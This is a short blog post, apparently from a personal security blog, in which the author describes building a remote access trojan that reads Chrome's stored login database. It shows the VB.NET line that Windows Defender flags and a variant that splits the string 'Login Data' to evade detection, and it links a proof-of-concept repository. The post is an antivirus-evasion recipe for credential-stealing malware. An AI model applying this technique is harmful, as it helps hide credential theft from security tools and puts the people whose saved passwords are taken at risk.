Bypassing Windows Defender by splitting a string

May 25, 2020

Bypassing Windows Defender by splitting a string

While working on the client for the RAT I discovered a "funny" Windows Defender behavior. I wanted to add a feature that collects stored login information from google chrome. After a quick google search I found a code example to extract these information. Of course this code snippet was a little bit older and detected by Windows Defender while compiling.

After some try and error and found out that this line of code causes the detection:

Dim sqllogin As New SQLiteHandler(GetFolderPath(SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login Data")

Especially the string "Login Data" causes the detection. By using a variable for the word "Data" no detection will be triggered.

Dim a = "Data"
Dim sqllogin As New SQLiteHandler(GetFolderPath(SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login " + a)

I uploaded a PoC here: https://github.com/Daniel-itsec/DefenderBypassPoC

However when uploading the poc to virus total it receives 10/72 detections. Not so much I think...

https://www.virustotal.com/gui/file/4149add8bb4dc2304ffeecdcc248127c412b492088e5b92a47e2871abd56f0f6/detection

Daniel

Search This Blog

Another IT Security Blog

Bypassing Windows Defender by splitting a string

Popular Posts

GOG Galaxy - Escalation of Privileges incl. Code Execution

Steam - Escalation of Privileges